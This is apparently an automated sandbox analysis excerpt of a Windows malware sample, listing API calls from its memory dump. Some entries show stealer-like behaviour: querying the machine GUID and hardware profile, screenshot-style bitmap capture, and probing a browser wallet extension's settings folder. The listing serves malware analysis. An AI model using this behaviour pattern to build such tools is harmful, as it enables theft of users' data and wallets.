                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                            • String ID: P&@
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$FileWrite
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0045E495
                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0045E4AF
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0045E4B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00463147,?,C:\Users\,0040730B,?,00000001,00000000), ref: 004629CB
                                                                                                                                            • CloseHandle.KERNEL32(?,00000001,?,?,00000000,00463147,?,C:\Users\,0040730B,?,00000001,00000000), ref: 004629E2
                                                                                                                                            • CloseHandle.KERNEL32(?,00000001,?,?,00000000,00463147,?,C:\Users\,0040730B,?,00000001,00000000), ref: 004629F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$FileUnmapView
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040A709
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040A725
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040A72C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __getptd_noexit
                                                                                                                                            • String ID: #E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ComputerName
                                                                                                                                            • String ID: Unknown
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0045BB21
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentProfile
                                                                                                                                            • String ID: Unknown
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0042E9D0
                                                                                                                                              • Part of subcall function 0046632E: __FF_MSGBANNER.LIBCMT ref: 00466347
                                                                                                                                              • Part of subcall function 0046632E: __NMSG_WRITE.LIBCMT ref: 0046634E
                                                                                                                                              • Part of subcall function 0046632E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004644D0,00000001,00000000,?,?,?,0046452E,004026BA), ref: 00466373
                                                                                                                                            Strings
                                                                                                                                            • failed to allocate %u bytes of memory, xrefs: 0042E9E0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catch_memmove
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead_memmove
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,00462BE3,?,?), ref: 00461EE4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0046AAAD: __getptd_noexit.LIBCMT ref: 0046AAAD
                                                                                                                                            • __lock_file.LIBCMT ref: 004651BF
                                                                                                                                              • Part of subcall function 004671E3: __lock.LIBCMT ref: 00467208
                                                                                                                                            • __fclose_nolock.LIBCMT ref: 004651CA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2800547568-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __lock.LIBCMT ref: 0046E66B
                                                                                                                                              • Part of subcall function 0046F899: __mtinitlocknum.LIBCMT ref: 0046F8AF
                                                                                                                                              • Part of subcall function 0046F899: __amsg_exit.LIBCMT ref: 0046F8BB
                                                                                                                                              • Part of subcall function 0046F899: EnterCriticalSection.KERNEL32(00000000,00000000,?,0046D05A,0000000D), ref: 0046F8C3
                                                                                                                                            • __tzset_nolock.LIBCMT ref: 0046E67C
                                                                                                                                              • Part of subcall function 0046DF72: __lock.LIBCMT ref: 0046DF94
                                                                                                                                              • Part of subcall function 0046DF72: ____lc_codepage_func.LIBCMT ref: 0046DFDB
                                                                                                                                              • Part of subcall function 0046DF72: __getenv_helper_nolock.LIBCMT ref: 0046DFFD
                                                                                                                                              • Part of subcall function 0046DF72: _free.LIBCMT ref: 0046E034
                                                                                                                                              • Part of subcall function 0046DF72: _strlen.LIBCMT ref: 0046E03B
                                                                                                                                              • Part of subcall function 0046DF72: __malloc_crt.LIBCMT ref: 0046E042
                                                                                                                                              • Part of subcall function 0046DF72: _strlen.LIBCMT ref: 0046E058
                                                                                                                                              • Part of subcall function 0046DF72: _strcpy_s.LIBCMT ref: 0046E066
                                                                                                                                              • Part of subcall function 0046DF72: __invoke_watson.LIBCMT ref: 0046E07B
                                                                                                                                              • Part of subcall function 0046DF72: _free.LIBCMT ref: 0046E08A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1828324828-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Gdip$DisposeFreeImage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1950503971-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 0040B364
                                                                                                                                              • Part of subcall function 004639F7: __EH_prolog3.LIBCMT ref: 004639FE
                                                                                                                                              • Part of subcall function 004639F7: std::_Lockit::_Lockit.LIBCPMT ref: 00463A14
                                                                                                                                              • Part of subcall function 004639F7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00463A36
                                                                                                                                              • Part of subcall function 004639F7: std::locale::_Setgloballocale.LIBCPMT ref: 00463A40
                                                                                                                                              • Part of subcall function 004639F7: _Yarn.LIBCPMT ref: 00463A56
                                                                                                                                              • Part of subcall function 004639F7: std::locale::facet::_Incref.LIBCPMT ref: 00463A63
                                                                                                                                            • std::locale::facet::_Incref.LIBCPMT ref: 0040B372
                                                                                                                                              • Part of subcall function 0040B332: std::_Lockit::_Lockit.LIBCPMT ref: 0040B33E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2389631691-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: swprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 233258989-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00420E26: _memset.LIBCMT ref: 00420E45
                                                                                                                                            • _memset.LIBCMT ref: 00422782
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045BCC5
                                                                                                                                              • Part of subcall function 0045BAFD: GetCurrentHwProfileA.ADVAPI32(?), ref: 0045BB21
                                                                                                                                              • Part of subcall function 0045BB5B: _memset.LIBCMT ref: 0045BB9D
                                                                                                                                              • Part of subcall function 0045BB5B: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,00000000,00000000), ref: 0045BBB9
                                                                                                                                              • Part of subcall function 0045BB5B: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,00000000,00000000), ref: 0045BBD8
                                                                                                                                              • Part of subcall function 0045BB5B: RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 0045BBE1
                                                                                                                                              • Part of subcall function 0045BB5B: CharToOemA.USER32 ref: 0045BBF2
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$CharCloseCurrentH_prolog3OpenProfileQueryValue_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 577691565-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00468E58,00000000,?,00000000,00000000,00000000,?,0046D0EF,00000001,00000214), ref: 00473699
                                                                                                                                              • Part of subcall function 0046AAAD: __getptd_noexit.LIBCMT ref: 0046AAAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 328603210-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00461FFB
                                                                                                                                              • Part of subcall function 00464B51: _malloc.LIBCMT ref: 00464B6B
                                                                                                                                              • Part of subcall function 00464B51: std::exception::exception.LIBCMT ref: 00464BA0
                                                                                                                                              • Part of subcall function 00464B51: std::exception::exception.LIBCMT ref: 00464BBA
                                                                                                                                              • Part of subcall function 00464B51: __CxxThrowException@8.LIBCMT ref: 00464BCB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2311266369-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040DAB1
                                                                                                                                              • Part of subcall function 0040C7EE: std::locale::facet::_Incref.LIBCPMT ref: 0040C801
                                                                                                                                              • Part of subcall function 0040D883: __EH_prolog3.LIBCMT ref: 0040D88A
                                                                                                                                              • Part of subcall function 0040D883: std::_Lockit::_Lockit.LIBCPMT ref: 0040D894
                                                                                                                                              • Part of subcall function 0040D883: int.LIBCPMT ref: 0040D8AB
                                                                                                                                              • Part of subcall function 0040D883: std::locale::_Getfacet.LIBCPMT ref: 0040D8B4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3$GetfacetIncrefLockitLockit::_std::_std::locale::_std::locale::facet::_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 199253227-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __flsbuf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2056685748-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 00402EBD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileOperation
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3080627654-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,?,00000000), ref: 0045CCA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BitmapCreateFromGdip
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4184683939-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040C6DE,?,0000001A), ref: 0045D0C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FolderPath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0045B6E9
                                                                                                                                              • Part of subcall function 0045EF7B: __EH_prolog3_GS.LIBCMT ref: 0045EF85
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_InfoSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2966166590-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GdipAlloc.GDIPLUS(00000010,0045CF44,?,00000000), ref: 0045CCBF
                                                                                                                                              • Part of subcall function 0045CC8D: GdipCreateBitmapFromHBITMAP.GDIPLUS(?,?,00000000), ref: 0045CCA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Gdip$AllocBitmapCreateFrom
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3133781713-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,0040558F,00000000,?,?,?,?,\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT,00000042,?,?,?,?,?,?,00000018), ref: 0045CE58
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0040C718,?), ref: 0040C672
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,004106D1,00000000,?,?,?,?,?,?,?,00000014), ref: 0045CE3B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fputc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4236582747-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wfsopen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fsopen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3646066109-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000105,00000000,00000104,0040DFD0,0000000F,?,00000000,?,?,?,?,?,?,?,00000014), ref: 0045CDBF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocLocal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3494564517-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: +Inf$-Inf$-x0$0123456789ABCDEF0123456789abcdef$Inf
                                                                                                                                            • API String ID: 0-2616461613
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID: ROWID$no such column: %s$rows updated
                                                                                                                                            • API String ID: 2102423945-702578623
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
